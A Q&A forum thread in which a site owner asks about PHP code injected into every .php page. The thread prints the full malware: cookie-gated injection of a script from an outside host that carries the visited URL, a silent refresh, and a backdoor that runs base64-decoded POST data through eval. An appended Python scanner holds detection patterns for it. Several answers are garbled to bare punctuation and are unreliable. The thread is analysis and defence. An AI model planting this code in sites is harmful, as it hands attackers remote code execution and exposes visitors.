What will this PHP script do? Is this malicious PHP code?

Can someone please advise what this PHP code will do? I have found this code on all .php pages; other files like js / css / php.ini are OK. Is it malicious code? If so, please suggest how to prevent it.

Here is the code

global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}
+5
4 answers

Most likely, it will redirect your page to the attacker's site. The @ will stop any errors, so you will not get any logs from this script.

You must delete it if you want your site to work correctly.

: , . script, cookie, javascript .

, - , , - - $_POST['showimg'], , POST.

: , , 0777, WordPress, WordPress . , .

+1

,

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));

, , , - .

+1

, , . /, , .

, Wordpress, , WordPress. ( ), .

0

I'm a security analyst, and I believe that it redirects you to a possible malicious website if and only if you do not have this cookie. If you already have this cookie, then the script will know that you have already been there, and possibly investigate the malware without performing a redirect. The image may look like a predefined detection debugger API. This is just my opinion.

0
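Since the question reports the snippet in every .php page, here is an added example (not from the thread) of a scanner that lists which files still carry it. The patterns are derived from the code quoted in the question; the indicator names and the sample strings are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Indicators taken from the injected snippet quoted in the question.
INDICATORS = {
    # Backdoor: eval() of base64-decoded, request-supplied data.
    "eval_b64_request": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(.{0,200}?\$_(POST|GET|REQUEST|COOKIE)\b",
        re.I | re.S),
    # Variable prefix used throughout the snippet.
    "sessdt_vars": re.compile(r"\$sessdt_[a-z]\b"),
    # <script src=...> echoed with a URL held in a PHP variable.
    "echoed_remote_script": re.compile(r"echo\s+[\"']<script\s+src=['\"]?\$", re.I),
    # Meta refresh echoed into the page.
    "echoed_meta_refresh": re.compile(r"echo\s+[\"']<meta\s+http-equiv=['\"]refresh", re.I),
}

def scan_php(source: str) -> list[str]:
    """Return the sorted names of the indicators present in one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))

def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan every .php file under root; return only files with at least one hit."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_php(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: INFECTED reuses lines from the question, CLEAN is benign PHP.
INFECTED = r'''<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1;
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){ eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p]))); exit; } }
?>'''
CLEAN = r'''<?php $logo = base64_decode($row["logo_b64"]); setcookie("lang", "en");
echo "<script src='/js/app.js'></script>"; ?>'''

if __name__ == "__main__":
    print("infected sample:", scan_php(INFECTED))
    print("clean sample:   ", scan_php(CLEAN))
    for root in sys.argv[1:]:          # e.g. python scan.py /var/www/html
        for path, found in scan_tree(root).items():
            print(path, found)
```

A file with no hits is not proof that it is clean, because a variant could use different variable names; treat the output as a list of files to restore from a known-good copy first.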